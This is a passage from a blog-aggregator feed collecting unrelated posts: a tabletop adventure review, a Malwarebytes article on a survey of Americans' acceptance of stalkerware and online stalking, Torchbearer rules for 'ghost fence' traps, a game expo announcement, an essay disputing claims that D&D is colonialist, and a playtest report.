the PlotThe culprit is there in plain sight: “cinematically”. This undoubtedly is a cinematic event, but one that makes for a lousy game: the characters have plot armour, their enemies are impotent, and the search for the switch succeeds or drags on purely at the discretion of an all-important Storyteller manipulating a GMPC. The encounter accomplishes the exact opposite of what it sets out to do: there is no real tension or challenge (because things are continuously being fudged to make things a bit easier or a bit harder), and no real accomplishment or sense of victory. A proper setup for this encounter would give the players a puzzle, and a countdown to hold back the tide until they can solve it (perhaps with the provision that on round 6+1d4, Carthean will do it on her own, should the players be absolutely incompetent puzzle-solvers). It would actually make it easier to describe and set up the encounter, and it would give the characters a real sense of beating the race against the clock. But this is obviously not what happens in this module.
It is fairly clear the author does not quite understand the game system he is writing for. It is no accident. The credits reveal it to be a scenario originally made for Advanced Fighting Fantasy 2nd Edition. I grew up on the Fighting Fantasy books, and love them to pieces – but they are obviously not D&D in their assumptions, and AFF is no exception. For example, D&D awards the bulk of its experience points for treasure – mountains of it. Like it or not (I have my reservations, on which I will write later), GP = XP is the grand equation of old-school D&D. Treasures of the Old Kingdom offers measly bounties of 60 gp (for the Mutant Ogre, going up to 80 if the characters haggle successfully), anaemic lair treasure at 1d6*100 gp (same place), and a princely tomb with “jewels worth 2d6*100 gp”. Or you can always search the trash for 2d6*2 gp (page 7). One thing is made clear here: the author does not know what “treasure” means in old-school D&D – only the final dungeon helps things. But don’t forget – you will have to divide up the loot among the party members.
For another case, let us take the module’s deathtraps, found in the final dungeon. Consider the following:“Every three rounds the tiles shift colour and if a player is not standing on a red tile (…) a vial of poison gas will drop from a hole in the ceiling onto the player and, if they do not make a Save roll [sic] they will suffer 1d6 damage.”Or:“The floor is false and once more than one person is on it the flagstones will give way and reveal a drop six foot drop [sic] down to spikes that inflict 1D6 damage if they fail a Save!”Or even:“Also, each chest has a 1 in 6 chance of being trapped with a mechanism so that when the chest is opened a poison dart shoots out of the lock doing 1 point of damage per round for 1D6 rounds. These traps can be found with a successful roll, and the dart avoided with a successful Save roll.”Disregard the typos, the lack of punctuation, the varieties of notation and the wrong terminology, and focus on the principal issue: the supposed deathtraps don’t do their job. They are feeble. Now yes, S&W Whitebox (a.k.a. LBB-only OD&D) is a game where first-level PCs have 1d6 Hp on the average, and damage is also 1d6 by default. Your character might die in them... if you trigger that 1:6 chance, followed by a failed save, followed by an unlucky rolls. Maybe. But these traps will never get respect. Here is a good one, from Tomb of the Serpent Kings:“When the bar is lifted, the iron pegs begin to rise. When the bar is fully removed a trap is activated. A huge stone hammer swings down from the ceiling, aiming straight for the backsof the now-trapped PCs. It nearly fills the corridor, but there is a small gap on either side. The PCs can:1. Save to Dodge OR2. Use another PC as a springboard, giving them +2 to Dodge but giving the shoved PC –2.PCs hit by the hammer automatically die (or take serious damage, like 2d6+4).”That is a trap that accomplishes what traps should do in a dungeon: make you very, very careful about taking the next step. I could also mention the ferocious animated statues guarding the vault’s treasures: they have what I would call (pardon my English) “shit HD and damage”. Something that is described as something like a hulking golem-like thing has 1+2 HD, and your regular 1d6 Hp damage. They are worth – no joke – 30 XP each. That's terror.I could no doubt go on about Treasures of the Old Kingdom. It seems to be wrong on many levels. But the central flaw of the adventure is that it is not written and set up as a worthwhile interactive experience. Why would you take a game whose central conceit is that you can “inhabit” fantastic characters and attempt the heroics you see in books and movies, and then take that control back through GM shenanigans? It is perhaps the bad question to ask from a small self-published affair like The Treasures of the Old Kingdom. The author did not do this to us. The module’s sins are not his. Other game designers, much more influential ones, did this to the author and all of us. It took so many of us a lot of effort to break free of our mental shackles after being taught – conditioned, even – to Love The Story or face the rats. This is the fate old-school gaming was supposed to liberate us from, and have us appreciate being free once more. And yet we still see this stuff, again and again and again. It is such a sadness.
No playtesters are credited in this publication.
Rating: * / *****
Categories: Tabletop Gaming Blogs

Stalkerware and online stalking are accepted by Americans. Why?

Malwarebytes - Thu, 02/27/2020 - 16:00

Despite warnings from domestic abuse networks, privacy rights advocates, and a committed faction of cybersecurity vendors, Americans may be accepting and minimizing online stalking behaviors, including the use of invasive apps that can pry into a user’s text messages, emails, photos, videos, and phone logs.

The limited opposition to these at-times abusive behaviors was revealed by a new study conducted by NortonLifeLock, consumer cyber safety vendor and founding member of the Coalition Against Stalkerware, which Malwarebytes helped form last year.

The distressing survey revealed that nearly half of individuals between the ages of 18 and 34 said they found online stalking to be “harmless.” Further, the study revealed that 1 in 10 Americans admitted to using digital monitoring apps—sometimes referred to as stalkerware—against their ex or current romantic partners.

How did we get here?

Unfortunately, we cannot exact whether the NortonLifeLock survey results represent a shift in attitudes or reflect a long-held acceptance of surveillance culture online. While US government agencies have recorded stalking statistics for decades, those same agencies either have not recorded admissions of online stalking behavior and perceptions of its harms, or did not respond to requests for such data.

However, domestic abuse advocates and researchers agreed that several factors play a role in the public’s acceptance of this type of behavior. Many romantic comedy films romanticize stalking, while increasingly more consumer home devices have normalized private, digital surveillance. Further, current mobile apps have turned the viewing of someone’s private life into an otherwise harmless interaction.

More likely, though, is that the public has always failed to recognize and respond to the actual harms of stalking, said Elaina Roberts, technology safety legal manager with National Network to End Domestic Violence.

“This is an age-old crime and people’s perceptions of it, in my opinion, haven’t changed all that much,” Roberts said.

The NortonLifeLock Online Creeping Survey

In conjunction with The Harris Poll, NortonLifeLock surveyed more than 2,000 adults in the United States about “online creeping”—behavior that includes consistent, stealthy tracking of someone online, which could also veer into behavior that is more akin to cyber stalking.

Overall, the survey found that 46 percent of respondents admitted to “stalking” an ex or current partner online “by checking in on them without their knowledge or consent.”

The most common forms of online stalking included checking a current or former partner’s phone—at 29 percent—and looking through a partner’s search history on one of their devices without permission—at 21 percent. Disturbingly, 9 percent of respondents admitted to creating a fake social media profile to check in on their partners, and 8 percent of respondents admitted to tracking a partner’s physical activity through their phone or through a health-related app.

Kevin Roundy, technical director for NortonLifeLock, warned about these behaviors.

“Some of the behaviors identified in the NortonLifeLock Online Creeping Survey may seem harmless, but there are serious implications when this becomes a pattern of behavior and escalates, or when stalkerware and creepware apps get in the hands of an abusive ex or partner,” Roundy said.

When asked why respondents engaged in these behaviors, the top two answers revealed a lack of trust and an itching, potentially harmful level of concern; 44 percent said “they didn’t trust [their partner] or suspected they were up to no good,” while 38 percent said they were “just curious.”

The gender disparity in the results was clear. In seemingly every category, men found it more acceptable to engage in these behaviors and to have these behaviors enacted against them.

While 35 percent of respondents said “they don’t care if they are being stalked online by a current or former partner as long as they are not being stalked in person,” it was 43 percent of men who agreed with that statement versus 27 percent of women. Further, 20 percent of men said they tracked a current or former partner’s location, versus 13 percent of women. Men also showed that they more readily accepted online stalking if one or both of the partners in a relationship had cheated or were merely suspected of cheating.

These results reflect broader statistics in America about who is more often victimized by stalking.

According to a national report of about 13,000 interviews conducted by the Centers for Disease Control and Prevention (CDC), an estimated 15.2 percent of women and an estimated 5.7 percent of men have been stalked in their lifetime. Women who said they were stalked during their lifetimes stated they were the target of a variety of behaviors, including being approached at home or work (61.7 percent); receiving unwanted messages like texts and voice mails (55.3 percent); and being watched, followed, or spied on with a “listening device, camera, or GPS device” (49.7 percent).

When asked if the CDC records the rate of admission of stalking behavior and perceptions to stalking behavior, a spokesperson said the agency does not keep such statistics.

The Bureau of Justice Statistics, which also tracks stalking in America, did not respond to a request for similar data.

Despite the two agencies’ robust datasets on the threat of stalking, the NortonLifeLock survey revealed a different perspective on similar behavior—a potentially concerning coziness with it. Young Americans in particular, the survey showed, found little threat in online stalking.

The survey said that 45 percent of those aged 18–34 found online stalking to be “harmless.” The same age group most heavily engaged in the behavior—65 percent said they have “checked in on a current or former significant other.”

Domestic abuse advocates argue that those high statistics reflect a society that fails to fully recognize the harms of stalking, cyberstalking, and invasive behavior toward romantic partners. Further, the language actually used in the survey might point to less nefarious interpretations by young people.

The normalization and minimization of stalking

Despite the NortonLifeLock study revealing troubling perceptions of online stalking behavior, Erica Olsen, director of Safety Net at National Network to End Domestic Violence, said these perceptions existed long before the advent of technology-enabled abuse. It’s been happening for decades, Olsen said.

“I unfortunately think that stalking behaviors have always, to some extent, been accepted and minimized.” Olsen said. “I think a lot of it has to do with the romanticizingof some of the behaviors—specifically following and spying.”

Olsen pointed to many romantic comedies that portray stalking as endearing.

In The Graduate, Dustin Hoffman’s character follows Katharine Ross’s character despite explicitly being told to drop contact, much like John Cusack’s character in Say Anything ignores the wishes of his ex-girlfriend played by Ione Skye. The 1954 film Seven Brides for Seven Brothers involves several men who kidnap a group of women, and no, it isn’t a horror movie.

As The New Statesmen wrote:

“A group of brothers kidnap six attractive women by causing a life-threatening avalanche that keeps them imprisoned all winter. The women play pranks on the men in revenge, and, in a shocking case of Stockholm syndrome, everyone has an all-round jolly time. They pair off and are all married by summer.”

These types of films can impact audience perceptions of intrusive and aggressive behavior, found Julia Lippman, a research fellow at the Center for Political Studies-Institute for Social Research at the University of Michigan.

According to Lippman’s paper, “I Did It Because I Never Stopped Loving You: The Effects of Media Portrayals of Persistent Pursuit on Beliefs About Stalking,” women who watched movies with positive portrayals of aggressive romantic pursual were more likely to accept those behaviors, as opposed to women who watched movies with scary or threatening depictions of those same types of behaviors.

In speaking to the online outlet Bustle, Lippman said:

“Positive media portrayals of stalking—like those where the pursuer is rewarded by ‘getting the girl’— can lead people to see stalking in a more positive light.”

Media portrayals aside, another factor could play a role in the public’s acceptance of online stalking that amounts to digital surveillance—the privatization of surveillance in our own neighborhoods. Millions of smart doorbells have crept into countless suburbs across America, capturing footage of package thieves, yes, but, more often, of neighbors, children, and animals engaged in harmless behavior.

According to a survey conducted by The Washington Post, smart doorbell owners who understood the privacy risks of their devices said the risks were not enough to deter them from ownership. As The Washington Post wrote:

“[In] the unscientific survey, most people also replied that they were fine with intimate new levels of surveillance—as long as they were the ones who got to watch.”

Finally, the acceptance of “online stalking” by younger generations could intersect with emerging ways of staying in touch with one another, and with the language that young people—particularly teenagers—use.

Diana Freed, a PhD student at the Intimate Partner Violence tech research lab led by Cornell Tech faculty, said that, in her research, she has found that teenagers often use the term “stalking” in a harmless way to check in on people online.

“It’s a very common term used with teens—‘Let’s stalk that person on Instagram,’—but they’re not saying it with the intent to harm,” Freed said.

(Full disclosure, when this Malwarebytes Labs writer attended college, he frequently heard the words “Facebook stalk” used to describe looking up a romantic crush, whether that meant viewing their photos or trying to find their “Relationship Status.”)

Freed said many apps also provide an opportunity for “wholesome” viewing of other people’s lives. With features like TikTok’s constant video feed or Snapchat Stories and Instagram Stories—which give users the ability to post phots and short videos for only 24 hours—users can view another user’s daily activities, despite being physically separated. That type of behavior does not have to be covert, Freed said, and can be done “with full knowledge” between two people who are friends offline.

“The ability to follow people closely is made available to us just by the features offered,” Freed said.

As to whether the presence of the technology itself—including stalkerware-type apps—has somehow created more stalkers, no expert interviewed for this piece saw a provable correlation.

Roberts of NNEDV said that even before the proliferation of GPS devices and stalkerware, domestic abusers would excuse their persistent, physical following of their partners by saying they were merely concerned for their partner’s safety. Today, she said, abusers use the same lies—urging survivors to use GPS location apps or stalkerware as a way to ensure safety.

“So, while we can potentially say that people are just more inclined to be accepting of this behavior today,” Roberts said, “I believe the truth is that people have always minimized these types of ‘caring’ behaviors as they appear to be done out of concern.”

Moving forward

All of this presents two concerning realities—Americans are growing warm to online stalking; Americans have always accepted stalking. Neither is the type of reality that should go unopposed.

Remember, online stalking that violates a person’s privacy is not harmless. Many of the behaviors described in the survey are the same types of behaviors that domestic abuse survivors face every day, from using stalkerware to learn private information, to tracking a person’s GPS location as a means to find them to inflict violence.

For years, Malwarebytes has worked to detect and raise awareness about invasive monitoring apps that can pry into users’ lives without their consent. This latest survey only proves that more work is needed. We’re ready for it.

The post Stalkerware and online stalking are accepted by Americans. Why? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Talking Heads

Torchbearer RPG - Thu, 02/27/2020 - 15:10

Hello friends!

The Sagas of Rimholm Kickstarter is well underway! In fact, as this post goes live there’s a little bit less than two days left in the campaign. I hope you’ll consider backing it if you haven’t already. It’s a zine, but also more than a zine! We zoom into a whole region of the Middarmark, from the Sakki Downs to the Temple of Black Skulls, and give you all the details and background for dozens of adventure sites. The hub of this region is Rimholm, and from any direction your adventuring party travels, there are rewards and dangers everywhere they go.

As an example of what we’ve been working on, I want to share a little bit about ghost fences.

When Koch first came to me to propose this project, he noted that he was particularly taken by a passing reference to “ghost fences” in the Middarmark Gazetteer. Could I write more about them?

I’m not sure, but I think I first stumbled across the concept in an issue of Mark Smylie’s Artesia comic, where the titular warrior-priestess character and her war band are caught out-of-doors on the night of the Wild Hunt after a battle. She makes a ghost fence from the heads of her defeated enemies to hide her warriors from the Wild Hunt.

I’ve read some suggestions that the Celts made such things, but there doesn’t seem to be much real evidence.

Anyway, the image was striking to me and I’ve borrowed it for the Sakki people.I should note that while the Bjornings would have you believe the Sakki are evil incarnate, and the practice of chaining ghosts to their severed heads is horrific, I don’t think the Sakki are any more or less evil than any of the other folk of the Middarmark. The cycle of violence and reprisal in the Middarmark is terrible and never-ending.Here are some rules for ghost fences and using them in your games. Enjoy!

Talking Heads

The Head-taker’s lips parted to reveal the skerry of incantations and the souls of the damned wailed from his dragging ghost chain.

—The Bjorningsaga

The Sakki were spirit-binders without peer, possessed of deep knowledge of the spirits of the land and a terrifying facility with enslaving and compelling the spirits of the dead. The thought that enclaves still linger in the deepest recesses of the Ironwold can turn the greatest champion’s bones to water. Many Bjornings believe Ukho the Head-taker, Sigrun’s bane, to have been the greatest of the Sakki witch-kings, though some brave or foolish few whisper that Gorm the Boneless, master of Svarttårn, had a Sakki witch for a mother.

Regardless, among those with the Wizard’s Sight, the story goes that the “dragging ghost chain” described in the Bjorningsaga was not a poet’s fancy. No. Those with eyes in the Otherworld, they say, could see the Head-taker holding a chain to which countless spirits of the dead were yoked by the neck.

Almost nothing is known of the Sakki that did not come from their enemies, but it is commonly believed that the Sakki pledged to serve their lords from the House of Death just as they served from the House of Life. Their Sakki followers pledged of themselves freely, but slaves had choice neither in life nor death. Enemies slain by Sakki witchfolk were not dissimilar from enemies captured alive; the only difference was whether one became a slave in the House of Death or the House of Life.

In the mist-shrouded Sakki Downs are the countless barrows of ancient Sakki kings, warded with ghost fences—rings of spears planted in the earth, upon which were set the heads of their enemies, bound to guard the tombs for all eternity.

—Sigrun’s Mirror and the Great Barrow, Middarmark, page 32

If one has the courage to venture among the barrows of the Sakki Downs, one can still see here and there the remains of a ghost fence, the last visible reminders of Sakki spirit-binding.

The Sakki would take spears taken from their enemies in battle and plant them in a ring about a place the Sakki wished to ward. They would place the severed heads of enemies upon the spears and then bind their ghosts to the rotting heads, forcing them to guard the place for all eternity rather than seeking a place in the Dry Lands. They have nothing to do save chitter and moan at each other through all the long ages to come. Most go mercifully mad before too long, but visitors excite them.

Ghost Fence

A ring of spears with severed heads impaled upon them, meant to ward something, usually a barrow. The eyes of the heads are lit with a baleful corpsefire. The heads chitter and rave. By turns they will shriek, threaten, plead for wine and meat, sob and beg for release from their torment.

Ghost fences exude horror. The victims who comprise the fence have been denied the Otherworld, severed from their ancestors and enslaved for eternity to another’s will, bodiless, lonely and bored. Their horror at their own terrible existence fuels the ward and projects it outward. The purpose of a ghost fence is to make anyone who attempts to enter the warded place flee, overcome by existential dread.

Trigger

The dread that rolls off a ghost fence can be felt from a long way off but its full force is only unleashed if someone approaches within easy speaking distance. The ghost fence affects people whether they are outside or inside the fence. Even if you manage to pass the fence and survive the crypt, you’ll have to face the horror again to escape. The area warded by a ghost fence is sometimes littered with the bones of would-be grave robbers who managed to get in but couldn’t get out…

Trap

Anyone who gets too close to a ghost fence must make a Will test, and the number of spirits chained to the fence determines its strength.

Trap Factors

A few spirits (4), nine or more spirits (5), dozens of spirits (6)

Each character that approaches the fence must test individually. No help is available. For a duration equal to margin of success, the character may pass between the spears to the warded area or interact with the spirits that comprise the fence. Anyone who fails is overcome by horror:

  • Suggested twist: They flee blindly from the ghost fence and drop whatever they were holding. They come to their senses lost and alone. The thought of the fence and what lies beyond fills them with dread.
  • Suggested condition: Afraid or Sick. Dread overcomes the character. They jump at their own shadow. Or they become feverish and nauseous just by thinking about the fence.
Dispelling a Ghost Fence

Breaking a ghost fence requires the Sign of Abrogation spell (Ob 4) or the Absolution of the Lord of Endings invocation (Ob 5). A banish conflict will not work on a ghost fence because the spirits are chained by the power of another.

Trap Reset

The effect of the ghost fence is permanent unless dispelled. It does not need to be reset. Characters who succeed on the Will test when faced with the fence may interact with it or bypass it for a duration equal to their margin of success on the test. Characters who fail but gain a condition may ignore the horror effect for one turn.

Speaking to a Ghost Fence

If one can overcome the terror and lure one or more of the heads into a lucid moment, one could converse with them. On the downs, there are fences made from the heads of Bjorning warriors of Bjorn’s and Sigrun’s times, but also more ancient fences of Sakki, Grælings and even some Skyrnir. They desire wine and meat and will beg for it. They know what lies within the space they ward and have been witness to anything that has transpired within eyeshot of the fence. Those close enough to other ghost fences to converse may have knowledge of things farther off. They beg for news or stories, something they haven’t heard a thousand times before.

For the purpose of social tests, ghost fences are Nature 4. They have descriptors appropriate to their tribe: Bjornings (boasting, demanding, sailing), Grælings (farming/fishing, suing, feuding), Sakki (climbing, skiing, spirit-binding), Skyrnir (storytelling, skygazing, herding).

Categories: Tabletop Gaming Blogs

Cryptozoic Will Demo Upcoming Games at GAMA Expo 2020

Cryptozoic - Thu, 02/27/2020 - 14:00

Cryptozoic will demo several upcoming games at GAMA Expo, March 9-12 at the Peppermill Resort in Reno, Nevada. At Booth #445, Cryptozoic will feature the highly anticipated Epic Spell Wars: Hijinx at Hell High and DC Deck-Building Game: Dark Nights: Metal. The company will also demo Steven Universe: Beach-a-Palooza Card Battling Game and Spycon, a team-based party game that is a spin-off of the hit Spyfall series.

Categories: Tabletop Gaming Blogs

On the Lie of Colonialism in Dungeons & Dragons

Hack & Slash - Thu, 02/27/2020 - 13:30
It's a golden age. I was casually browsing the internet and found this! A 215 page document about a West Marches campaign.

It's good. The biggest flaw of the work is its devotion to exhaustively developing tangential systems. As a work designed to introduce a new player who cut his teeth on 5th edition into the complexities of sandbox play it's very useful. There are moments of interest when they tease more creative results, such as the nature of the town or zone traits, but these are rare. It has solid ability to present what's actually going on in the design decisions made when developing a classic sandbox. Then again, if the whole concept is new the lack of novel or unique complications is a benefit.

You can move your finger in the tiniest way to instantly peruse this piece of work. But I came across this section, and realized that something that is clearly a misunderstanding is being taken as gospel. Let me quote.

Since its inception in the ‘70s, the base game itself has had profound issues surrounding racism and the colonialist mindset. Fifth Edition has done little to mitigate these issues, and if anything, the West Marches only make the longstanding rot more visible.

This sounds reasonable and true, except it's not.

This is an article that deals with colonialism, racism, sexism, violence, and other things that don't go particularly well with a morning coffee when you have a stressful day ahead at work.

Colonial IgnoranceI'm not trying to justify any inappropriate behavior. I was a counselor for 20 years working with native youth in rural low income communities, some of which are not reachable by road. I believe that all living people and quite a few animals possess infinite self-worth (in the Carl Rogers sense of worth) that is in no way related to any external, from income, to skin color, to education. I am aware of the many intersections of racism, bigotry, sexism, and systemic oppression for a wide variety of external features, and I believe in the equality and worth of all human beings.
I am just trying to stop well meaning people from repeating inaccurate sentiments.
Here are my points, I will explain each.
  • The game itself is not in structure or design racist. It is by (possibly accidental) design a model for the experience of the arc of experience of human life, a game that makes the psychological experience of playing mirror the experience of coming of age. 
  • The game does not represent European Colonialism, certainly not from the years 400-1800+. One of the smartest people in the tabletop role-playing game field (who backed my Kickstarter!!) recently said Dungeons and Dragons could not have ever been created in Europe due to the mindset of the game. It is much more accurate to say that the game is about the experience of western exceptionalism and manifest destiny. Game-play revolves around civilizing wilderness, not conquering and exploiting existing civilization structures. ("The 'frontier' moves, and bold adventurers move with it"—1st edition DMG, page 91) It represents the spirit of manifest destiny (c. 1845), i.e. the belief that due to american's cultural and societal superiority that it was america's responsibility to raise humanity to the pinnacle of human achievement.  This has been widely regarded as a bad move. This is not necessarily more moral, but it is more accurate.
  •  There is no rot within the game itself, only within the within the person where it occurs. This is not an argument of fact, but rather a statement that I respect the right of an individual to be responsible for their own actions, rather then attempting to control media or access. I am an artist and not an authoritarian. The arguments for freedom versus societal control are in the public record, and you likely have an opinion on it. This is the argument being made, and it is the argument I am responding to. You can play D&D without worrying about the state of your soul because there is no rot within it.
Game Structure and RacismI am not courting outrage, I am not interested in proving some point for some external system of control. I am not attempting to promote any agenda but the truth.
Dungeons and Dragons is a game of fantasy adventure.
Fantastic creatures are stories and manifestations of ideas we have that represent our concerns or fears. I will list a few to illustrate my point. Werewolves are about fears of alcoholic behavior, giants are about our experiences of adults and our fears of them as children. a lich is a monster who denies your ability to achieve autonomy over your life, because the men before you refuse to die and make way for their children, vampires represent our fears and concerns over rape and death, zombies represent our fears of rampant consumerism and a loss of identity, the succubus is a metaphor for male fears in relationships, orcs are our fear of our memory of our ancient smarter, stronger, more athletic neanderthal companions,  dragons literally represent sin as an obstacle to spiritual purity, most often greed. 
This is not some hypothetical conjecture. Anxiety represented by nocturnal terrors is as old as humanity. They are literally our responses to fears and anxieties. There is a not insignificant body of work on this subject.
They are not representative of black people, natives, aborigines, or other indigenous peoples. In fact, making that claim, in and of itself seems quite spurious to me, because the way they are presented and used in the game is in no way representative of any of the historical interactions with native cultures. 
Racists absolutely play D&D. I was, and this is the correct word, flabbergasted at the sheer Illinois Nazism of the Bledslaw clan. Refusing to join the KKK is not what I would consider an affirmative defense! So these racists have clearly decided to co-op and gratify themselves by being fucking horrid human beings.  
To assume that this is what is coded in the work, misses both the literal and critical subtext, which is mythical threat to your survival and ability to flourish as a human being. To wit:
Under Preparation For the Game OD&D Volume 1First, the referee must draw out. . . maps of the levels of his "underworld", people them with monsters of various horrid aspect, distribute treasures accordingly. . . When this task is completed the participants can then be allowed to make their first descent into the dungeons beneath the "huge ruined pile, a vast castle built by generations of mad wizards and insane geniuses".Under Character Alignment in Moldvay Basic D&D.To a Chaotic creature, the individual is the most important of all things. Selfishness is the normal way of life, and the group is not important. Chaotics often act on sudden desires and whims. They cannot be trusted, and their behavior is hard to predict. They have a strong belief in the power of luck. Chaotic behavior is usually the same as behavior that could be called evil. Under Approaches to Playing Advanced Dungeons & Dragons in the 1st Edition Dungeon Master's guide
Of the two approaches to hobby games today, one is best defined as the realism-simulation school and the other as the game school. AD&D is assuredly an adherent of the later school. It does not stress any realism . . . [i]t does little to attempt to simulate anything. It is first and foremost a game for the fun and enjoyment of those who seek to use imagination and creativity. . . In all cases, however, the reader should understand that AD&D is designed to be an amusing and diverting pastime, something which can fill a few hours or consume endless days as the participants desire, but in no case something to be taken too seriously. For fun, excitement and captivating fantasy, AD&D is Unsurpassed. As a realistic simulation of things from the realm of make-believe, or even as a reflection of medieval or ancient warfare or culture or society, it can be deemed only a dismal failure. Readers who seek the later must search elsewhereLet's assume you disregard both the structure of the early games, AND this snippet of the creators thoughts as he wrote the seminal work on running games, during the height of its first popularity.

Sure, neither the text nor his claims say he's racist, but that's just what a racist would say. Is the design or the text racist?

No.

Under Alignment in the 1st Edition Dungeon Master's Guide
Thus, alignment describes the worldview of creatures and helps to define what their actions, reactions, and purposes will be. . . Good and Evil: Basically stated, the tenets of good are human rights, or in the case of AD&D, creature rights. Each creature is entitled to life, relative freedom and the prospect of happiness. Cruelty and suffering are undesirable. Evil, on the other hand, does not concern itself with rights or happiness; purpose is the determinant. 
He defines good as the protection of rights extended to all good creatures. Goodness is defined as the rights of thinking creatures-not just humans and humanoids, but all good creatures no matter their distance from the human form.

This is fundamentally opposed to racist and colonial thought. They are completely incompatible. Racist and colonialism require removing rights from creatures. It requires a perspective of military superiority, moral arrogance and a desire to exploit less lucky victims. This is not the attitude of most D&D players, who encounter a world they can never conquer or tame, and only through dint of their gumption can they survive in.

But the Natives!There's this thought in society, of the wolf in sheep's clothing. A missing stair. A sociopath who lairs, and attempts to make himself seem respectable so he can continue his degenerate abuse or assault. 
That's what strikes me as so odd about this claim, and leaves me wondering about the motives of the people making it, to say less of those that hear it and simply repeat it because they have not given it much thought. 
From The Campaign in the 1st Edition Dungeon Master's Guide
After a few episodes of play, you and your campaign participants will be ready for the expansion of the milieu. The territory around the settlement—likely the "home" city or town of the adventurers, other nearby habitations, wilderness areas, and whatever else you determine is right for the area—should be sketch-mapped, and places likely to become settings for play actually done in detail. At this time is it probably that you will have to have a large scale map of the whole continent or sub-continent involved, with some rough outlines of the political divisions of the place, notes on predominant terrain features, indications of the distribution of creature types, and some plans as to what conflicts are likely to occur. In short, you will have to create the social and ecological parameters of a good part of a make-believe world. The more painstakingly this is done, the more "real" this creation will become. . .
It is no exaggeration to state that the fantasy world builds itself, almost as if the milieu actually takes on a life and reality of its own. . . Similarly, the geography and history you assign to the world will suddenly begin to shape the character of states and peoples. Details of former events will become obvious from mere outlines of the past course of things.  
and from Territory Development by Player Characters in the 1st Edition Dungeon Master's GuideWhen player characters reach upper levels and decide to establish a stronghold and rule a territory, you must have fairly detailed information on hand to enable this to take place. You must have a large scale map which shows areas where this is possible, a detailed cultural and social treatment of the area and those which bound it, and you must have some extensive information available as to who and what lives in the area to be claimed and held by the player characters. . . . The player character and his henchmen and various retainers must now go to the construction site, explore and map it, and have construction commence. . .  Once these territories become settled and populations abound (relatively speaking) they can be used as centers for activity—good or evil or whatever.
It does not appear that the author of the game nor the structure of the game take any sort of stance on what should happen during play. It's explicitly a game, where there are threats to civilization, people you must interact with, and allies you must make happy.The people claiming that it's racist because you invade the homes of the natives and kill them and take their things is more a reflection of how they choose to play the game and not an expectation within the text. (Modules about such being a reflection of their author, and not some inherit racism in design)
My players put up with the alcoholic ogres because they were willing to pay the costs, they didn't kill them to a man. A contract was negotiated with the frost giant lich, and peace was signed by the orc tribes (in a game where you might portray them in the role of noble savage, itself a racist caricature, instead of as a malignant force upon the existence of man.)
It's even within the rules of the game. Monsters give very little experience, and you are better off finding a superior solution than fighting to gain the reward. Real success comes from solving the encounter creatively using your wits, strength, and will just like mythological heroes. It is outlined as a game, and given to player driven complexity. If you want to deal with those issues (orcs are natives on the land with wives and children) or not (orcs are representative of malignant evil) you have the choice. People have been dealing with this exact choice (the orc baby choice) and being blindsided to the fact that it's a choice for, well, as far back as the 70's.  To claim that the game itself decides what you must do isn't supported. 

But the Patriarchy!I mean, I'm not making any kind of claim of purity. The game is astoundingly sexist. "race" and "Half-X" are racist vestiges of a dark time in America when the air was filled with lead. The game at times has had people produce art that is filled with stereotypical racist representations. It has had middle Americans tackle the task of writing about other cultures when Americans were still beating natives for speaking their own language in Alaska in the early 1980's. Could we get supplements for non-white non-human societies that aren't shallow?
I fail to see how the behavior of racists is somehow uniquely objectionable in role-playing, when the medium seems unrelated to the bigotry. There's a whole genera of slightly conservative military fiction that glorifies the subjection of the universe. If your argument is that it's racist because some people who played it are racist, that point flows to you, because it's a truism. Not a statement about the text. One could certainly start to make cottage industry arguments for papers about how D&D is akin to sexual violence because it models combat which involves weapon penetrating human bodies like the penis does for the sex act. But my daughter has after school activities and I don't have the time, so could you not? 
But the racism that's talked about above is not in the core structure of the text, unless someone classifies another person as a monster. The text explicitly doesn't.
This doesn't mean we don't need to do the work of making sure our games are not cliches that rely on stereotypical racist, warlike, western tropes. 
The game is about fighting fantasy monsters—monsters which represent our fears and anxieties, coming up with solutions to complex situations with creativity and panache, so that you can secure an ability for your character to flourish. It is the modern hunt for the grail. The knight doesn't face the dragon to remove a monster, he does so to purify his soul from sin. 
To complain that a group of monsters are 'evil' is to be upset that the aliens in Independence day were all bad guys, the Persians were represented as monsters to the greeks in 300, and the Chitauri were cut down by the thousands by the Avengers. Maybe you'd like to make the argument that is a problem, which sure. Maybe. But it's got f-$& all to do with Dungeons & Dragons.
Gaining control of a wilderness means not only clearing out malignant evils that desire nothing but the destruction of the world, but also meeting locals, managing contentious neighbors, and learning ancient history, giving you the opportunity to found your own better world. 
So, now you know. Don't be a stranger.
If you liked this, back my kickstarter! Quick! Famous artists making more fantasy art! Tricks and Deceptions reborn! If you want the kind of clarity you got from this article in a book about tricks and special situations in D&D, check it out. Learn of the old ways and how to bend your campaign to new exciting emergent experiences!Hack & Slash FollowTwitchNewsletterSupportDonate to end Cancer (5 Star Rating)
Categories: Tabletop Gaming Blogs

Play Test Report

The Splintered Realm - Thu, 02/27/2020 - 12:27
I play tested the rules about multiple actions. I am trying out something that’s quite the departure for me; as a bug, you get a number of attacks each round equal to your level. Predators don’t get this benefit.
I created a level 5 red ant ranger and had him go off in search of an assassin bug who was holed up in a hut. There were four guards out front of the hut, four gnats who were keeping watch. My ranger, Nix, made is sneak check easily, and got within range. With his scope, he has a range of 8, so he was able to target them from 8 cm. He got five attacks, and hit with four of five shots, taking out all five gnats with surprise.
This got the attention of the assassin bug, who returned fire. They both had light cover, so the two exchanged several gunshots for a few rounds, but Nix was clearly superior. He took 14 points of damage out of his 50 hit points during the fight.
However, the gunfire attracted a tree frog, that attacked with surprise at the end of the round. This combat was a lot of fun; Nix got a few shots off before the frog hit him with a tongue strike and started dealing automatic bite damage. His weapon jammed and then he dropped it (with a series of 1s) and he had to pull out his survival knife. He started hacking at the frog, and ended up finishing it with 11 hit points left.
I really liked the multiple attacks per round, even for enemies. I like that a single powerful foe can fight an entire team at once; a level 3 bug can fire three times per round, giving him a lot of versatility in selecting targets.
I also like that there is a different ‘feel’ to the game between battling other bugs and predators. Other bugs pepper you with many small attacks, whereas predators are slower, but when they hit it packs a wallop.
I feel like damage doesn’t ramp up as much in this game as in the fantasy and supers games, so having the number of attacks increase offsets this. I like the subtle way that combat ‘feels’ different for this game rather than the fantasy game. It plays very fast. 

Weird(world) Revisited: Middle Earth the Mighty Marvel Way

Sorcerer's Skull - Thu, 02/27/2020 - 12:00
My recent post on "vanilla" fantasy made me think of Weirdworld and this post from 2010...

"For those who thrilled to J.R.R. Tolkien's "Lord of the Rings"--An All New Adventure into Epic Fantasy!"

